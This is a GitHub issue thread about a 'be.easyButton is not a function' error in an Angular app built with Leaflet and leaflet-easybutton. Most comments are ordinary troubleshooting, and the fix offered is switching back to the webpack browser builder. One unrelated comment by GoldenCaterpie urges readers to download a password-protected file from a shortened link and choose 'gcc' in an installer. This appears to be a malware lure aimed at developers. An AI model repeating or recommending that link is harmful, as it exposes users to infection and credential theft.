### ISSUE TITLE
An error occurs with EasyButton when accessing.

### ISSUE THREAD

**Issue by MoonlightKOBE** [CliffCloud/Leaflet.EasyButton#112]
I created a frontend app in Angular and deployed it to Tomcat 10, and the following error occurs with easyButton.

> TypeError: be.easyButton is not a function
    at t.initMap (main-42XGJJIS.js:8:103583)
    at t.<anonymous> (main-42XGJJIS.js:8:102931)
    at Generator.next (<anonymous>)
    at a (main-42XGJJIS.js:1:948)
    at f.invoke (polyfills-SCHOHYNV.js:1:6450)
    at Object.onInvoke (main-42XGJJIS.js:7:27412)
    at f.invoke (polyfills-SCHOHYNV.js:1:6390)
    at Y.run (polyfills-SCHOHYNV.js:1:1715)
    at polyfills-SCHOHYNV.js:2:553
    at f.invokeTask (polyfills-SCHOHYNV.js:1:7075)
    
    
The versions are as follows:
leaflet: 1.9.4
leaflet-easybutton: 2.4.0

You can find out the situation by visiting the following website:
http://moonlightkobe.mydns.jp/Fltmap/MLKOBE

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by nhuttruong9920** [comment]
@MoonlightKOBE I had the same issue with nginx. Have you fixed it yet?

**Comment by davidmcclelland** [comment]
@nhuttruong9920 Now I"m having the same issue. Did you figure anything out?

**Comment by nhuttruong9920** [comment]
> @nhuttruong9920 Now I"m having the same issue. Did you figure anything out?

I'm switching back building with webpack `"builder": "@angular-devkit/build-angular:browser",` and it works.
